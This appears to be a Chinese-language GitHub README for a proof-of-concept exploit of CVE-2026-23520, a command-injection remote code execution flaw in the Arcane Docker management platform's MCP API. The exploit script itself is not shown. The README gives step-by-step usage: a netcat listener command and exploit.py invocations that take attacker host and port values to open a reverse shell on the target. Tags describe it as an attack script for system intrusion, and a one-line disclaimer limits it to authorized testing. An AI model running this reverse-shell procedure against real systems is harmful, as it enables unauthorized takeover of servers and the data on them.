cypher-21/CVE-2026-23520
GitHub: cypher-21/CVE-2026-23520
针对 Arcane Docker 管理平台 MCP API 命令注入漏洞(CVE-2026-23520)的远程代码执行 PoC 利用脚本。
Stars: 1 | Forks: 0
# CVE-2026-23520
## MCP API 远程代码执行 (RCE) PoC
## 📌 概述
本仓库包含针对远程代码执行 (RCE) 漏洞的概念验证 (PoC) 利用代码,该漏洞影响暴露了易受攻击 MCP API 端点(通常为 `/api/mcp/connect`)的应用程序。
该漏洞允许通过精心构造的 API 请求执行系统级命令。
## 🚀 快速开始
### 1. 启动监听器
```
nc -lvnp ATTACKER_PORT
```
### 2. 运行 exploit
```
python3 exploit.py TARGET --lhost ATTACKER_IP --lport ATTACKER_PORT
```
## 📥 用法
```
python3 exploit.py --lhost --lport [options]
```
## 🔑 必选参数
| Argument | Description |
| -------- | ------------------------- |
| target | 目标 IP、域名或 URL |
| --lhost | 攻击者 IP |
| --lport | 攻击者端口 |
## 🔧 可选参数
| Flag | Description |
| -------------- | ------------------------------ |
| -p, --port | 目标端口 (默认: 443) |
| -s, --scheme | http 或 https (默认: https) |
| -e, --endpoint | API 端点路径 |
| -t, --timeout | 请求超时时间 |
| -v, --verbose | 调试输出 |
## 🧪 示例
```
python3 exploit.py example.com --lhost 10.10.10.10 --lport 4444
```
```
python3 exploit.py example.com -s http -p 80 --lhost 10.10.10.10 --lport 4444
```
## 🧠 注意事项
* 超时不一定意味着失败。
* 在利用前请确保你的监听器正在运行。
* Payload 假定目标上可用 `/bin/bash`。
## ⚠️ 免责声明
仅供授权测试和教育用途。
## 👨💻 作者
Parosh B
标签:API安全, Arcane, CISA项目, CVE-2026-23520, Docker管理平台, JSON输出, MCP API, PoC, Python, RCE, 反弹Shell, 命令注入, 攻击脚本, 无后门, 暴力破解, 系统入侵, 编程工具, 网络安全, 输入验证缺失, 远程代码执行, 逆向工具, 隐私保护, 高危漏洞